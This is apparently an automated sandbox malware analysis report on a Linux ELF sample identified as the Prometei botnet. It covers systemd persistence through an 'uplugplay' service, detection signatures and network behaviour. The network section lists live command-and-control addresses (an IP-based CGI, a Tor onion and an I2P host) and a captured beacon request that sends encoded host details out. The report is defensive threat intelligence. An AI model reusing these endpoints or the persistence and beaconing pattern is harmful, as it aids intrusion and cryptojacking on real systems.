Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1652654
MD5:	cb12d1dd62d556d8baa0d115e6d41083
SHA1:	614a2974a372443717d9e765ae263fdf8025e1e8
SHA256:	f91c066c91adc1434c8182791a7e176ec7367baa09f98084c4d3949ea48ee546
Tags:	elfuser-abuse_ch
Infos:

Detection

Prometei

Score:	100
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Prometei

Drops files in suspicious directories

Found Tor onion address

Sample deletes itself

Sample is packed with UPX

Creates hidden files and/or directories

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "pgrep" command search for and/or send signals to processes

Executes the "systemctl" command used for controlling the systemd system and service manager

Executes the "uname" command used to read OS and architecture name

HTTP GET or POST without a user agent

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Sample contains only a LOAD segment without any section mappings

Sample listens on a socket

Sample tries to set the executable flag

Suricata IDS alerts with low severity for network traffic

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1652654
Start date and time:	2025-03-31 10:52:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/13@0/0

Warnings

VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1

Runtime Messages

Command:	/tmp/na.elf
PID:	6217
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Starting... System install...OK
Standard Error:	Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.

Process Tree

system is lnxubuntu20

na.elf (PID: 6217, Parent: 6130, MD5: cb12d1dd62d556d8baa0d115e6d41083) Arguments: /tmp/na.elf

na.elf New Fork (PID: 6220, Parent: 6217)

sh (PID: 6220, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"

sh New Fork (PID: 6221, Parent: 6220)

pgrep (PID: 6221, Parent: 6220, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf

na.elf New Fork (PID: 6224, Parent: 6217)

sh (PID: 6224, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"

sh New Fork (PID: 6225, Parent: 6224)

pgrep (PID: 6225, Parent: 6224, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay

na.elf New Fork (PID: 6230, Parent: 6217)

sh (PID: 6230, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"

sh New Fork (PID: 6231, Parent: 6230)

pidof (PID: 6231, Parent: 6230, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay

na.elf New Fork (PID: 6234, Parent: 6217)

sh (PID: 6234, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"

sh New Fork (PID: 6235, Parent: 6234)

pgrep (PID: 6235, Parent: 6234, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup

na.elf New Fork (PID: 6238, Parent: 6217)

sh (PID: 6238, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"

sh New Fork (PID: 6239, Parent: 6238)

pidof (PID: 6239, Parent: 6238, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup

na.elf New Fork (PID: 6242, Parent: 6217)

sh (PID: 6242, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 6243, Parent: 6242)

systemctl (PID: 6243, Parent: 6242, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

na.elf New Fork (PID: 6256, Parent: 6217)

sh (PID: 6256, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"

sh New Fork (PID: 6257, Parent: 6256)

systemctl (PID: 6257, Parent: 6256, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service

na.elf New Fork (PID: 6262, Parent: 6217)

sh (PID: 6262, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"

sh New Fork (PID: 6263, Parent: 6262)

systemctl (PID: 6263, Parent: 6262, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service

systemd New Fork (PID: 6245, Parent: 6244)

snapd-env-generator (PID: 6245, Parent: 6244, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6260, Parent: 6259)

snapd-env-generator (PID: 6260, Parent: 6259, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6264, Parent: 1)

uplugplay (PID: 6264, Parent: 1, MD5: cb12d1dd62d556d8baa0d115e6d41083) Arguments: /usr/sbin/uplugplay

uplugplay New Fork (PID: 6267, Parent: 6264)

uplugplay New Fork (PID: 6268, Parent: 6267)

sh (PID: 6268, Parent: 6267, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"

sh New Fork (PID: 6269, Parent: 6268)

uplugplay (PID: 6269, Parent: 6268, MD5: cb12d1dd62d556d8baa0d115e6d41083) Arguments: /usr/sbin/uplugplay -Dcomsvc

uplugplay New Fork (PID: 6273, Parent: 6269)

sh (PID: 6273, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 6274, Parent: 6273)

hostnamectl (PID: 6274, Parent: 6273, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 6413, Parent: 6269)

sh (PID: 6413, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 6414, Parent: 6413)

uptime (PID: 6414, Parent: 6413, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 6417, Parent: 6269)

sh (PID: 6417, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 6418, Parent: 6417)

uname (PID: 6418, Parent: 6417, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

uplugplay New Fork (PID: 6438, Parent: 6269)

sh (PID: 6438, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 6439, Parent: 6438)

hostnamectl (PID: 6439, Parent: 6438, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 6445, Parent: 6269)

sh (PID: 6445, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 6446, Parent: 6445)

uptime (PID: 6446, Parent: 6445, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 6449, Parent: 6269)

sh (PID: 6449, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 6450, Parent: 6449)

uname (PID: 6450, Parent: 6449, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

systemd New Fork (PID: 6276, Parent: 1)

systemd-hostnamed (PID: 6276, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed

fwupd New Fork (PID: 6423, Parent: 1)

gpg (PID: 6423, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version

fwupd New Fork (PID: 6425, Parent: 1)

gpg (PID: 6425, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 6427, Parent: 1)

gpg (PID: 6427, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 6429, Parent: 1)

gpg (PID: 6429, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

fwupd New Fork (PID: 6431, Parent: 1)

gpg (PID: 6431, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Prometei		No Attribution	https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html https://cujo.com/iot-malware-journals-prometei-linux/ https://twitter.com/IntezerLabs/status/1338480158249013250 https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
na.elf	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Dropped Files

Source	Rule	Description	Author	Strings
/usr/sbin/uplugplay	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Memory Dumps

Source	Rule	Description	Author	Strings
6217.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_1a4eb229	unknown	unknown	0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6217.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_f454ec10	unknown	unknown	0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6217.1.000000000052d000.0000000001575000.rw-.sdmp	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6217	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
Process Memory Space: na.elf PID: 6217	JoeSecurity_Prometei_1	Yara detected Prometei	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-31T10:53:09.953180+0200	2803305	3	Unknown Traffic	192.168.2.23	58304	152.36.128.18	80	TCP
2025-03-31T10:53:10.612353+0200	2803305	3	Unknown Traffic	192.168.2.23	58306	152.36.128.18	80	TCP

Joe Sandbox Signatures

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: na.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/sbin/uplugplay

Avira: detection malicious, Label: LINUX/GM.Agent.JQ

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 47%

Bitcoin Miner

Yara detected Prometei

Source: Yara match

File source: Process Memory Space: na.elf PID: 6217, type: MEMORYSTR

Source: /usr/sbin/uplugplay (PID: 6269)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 6221)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6225)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6235)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6414)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6446)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Networking

Found Tor onion address

Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1 HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDAzOjUzOjA5IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAxLjc2LCAwLjg0LCAwLjM0fDE3NDM0MTExODkNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=213U6SANKFY6LBV1&h=galassia&enckey=Q9+c0mlQRt8dIAQ/YFGImVwcfDVs1ROy5aruhr0qjaI2YBRXFl830T3sU2Y/YBj0K3Q62hoRjN3dzhq0PFRt7U4iiPAYPw3pxx633dcPuTnVjsE908sStaVY+PXgMhy9JnKrPyj1z7cqV8xRMSKa3+1FRhk0oZe+5iPm5FUDFwI= HTTP/1.0Host: 152.36.128.18

Source: /usr/sbin/uplugplay (PID: 6269)

Socket: 0.0.0.0:89

Jump to behavior

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80

Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1 HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDAzOjUzOjA5IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAxLjc2LCAwLjg0LCAwLjM0fDE3NDM0MTExODkNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=213U6SANKFY6LBV1&h=galassia&enckey=Q9+c0mlQRt8dIAQ/YFGImVwcfDVs1ROy5aruhr0qjaI2YBRXFl830T3sU2Y/YBj0K3Q62hoRjN3dzhq0PFRt7U4iiPAYPw3pxx633dcPuTnVjsE908sStaVY+PXgMhy9JnKrPyj1z7cqV8xRMSKa3+1FRhk0oZe+5iPm5FUDFwI= HTTP/1.0Host: 152.36.128.18

Source: na.elf, uplugplay.12.dr	String found in binary or memory: http://152.36.128
Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: na.elf, uplugplay.12.dr	String found in binary or memory: http://upx.sf.net
Source: na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55238
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55238 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: 6217.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
Source: 6217.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
Source: 6217.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown

Source: LOAD without section mappings

Program segment: 0x400000

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: 6217.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
Source: 6217.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
Source: 6217.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/13@0/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $

Source: /usr/bin/pidof (PID: 6231)	Directory: //.	Jump to behavior
Source: /usr/bin/pidof (PID: 6239)	Directory: //.	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6276)	Directory: <invalid fd (10)>/..	Jump to behavior
Source: /usr/bin/gpg (PID: 6425)	File: /var/lib/fwupd/gnupg/.#lk0x000055e85c3a9b80.galassia.6425	Jump to behavior
Source: /usr/bin/gpg (PID: 6427)	File: /var/lib/fwupd/gnupg/.#lk0x000055e78355eb80.galassia.6427	Jump to behavior
Source: /usr/bin/gpg (PID: 6429)	File: /var/lib/fwupd/gnupg/.#lk0x0000561fc14f8b80.galassia.6429	Jump to behavior
Source: /usr/bin/gpg (PID: 6431)	File: /var/lib/fwupd/gnupg/.#lk0x000055f30dfd7b80.galassia.6431	Jump to behavior

Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1582/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/3088/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/230/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/230/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/110/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/110/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/231/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/231/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/111/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/111/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/232/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/232/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1579/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/112/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/112/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/233/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/233/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1699/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/113/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/113/cmdline	Jump to behavior
